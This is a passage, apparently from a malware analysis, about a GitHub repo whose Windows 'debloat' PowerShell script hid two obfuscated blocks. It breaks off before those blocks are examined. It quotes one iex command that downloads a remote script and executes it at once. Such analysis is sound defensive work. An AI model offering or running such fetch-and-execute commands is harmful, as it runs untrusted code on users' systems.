The public repo https://github.com/windowtoolbox/under_observation (the original name was changed by github as the repo is now under observation and all repo files are unaccessible) looked like providing a Powershell script that will optimize and debloat your Windows installation. Strange enough the actual script was not included in the repo as a file but just as a download link in the readme file of the repo. It was all quite suspicious. The installation instruction was the typical iex instruction like this:
iex((New-Object System.Net.WebClient).DownloadString('https://link-to-the-scriptfile'))
Downloading the script by hand gives us a Powershell script with a lot of instructions that actually do what the script pretended to do, they change a lot of system parameters for optimization and de-install software for debloating Windows.
But beside that code there are two blocks of obfuscated code that looked suspicious - well they are obfuscated so you wouldn't expect them to contain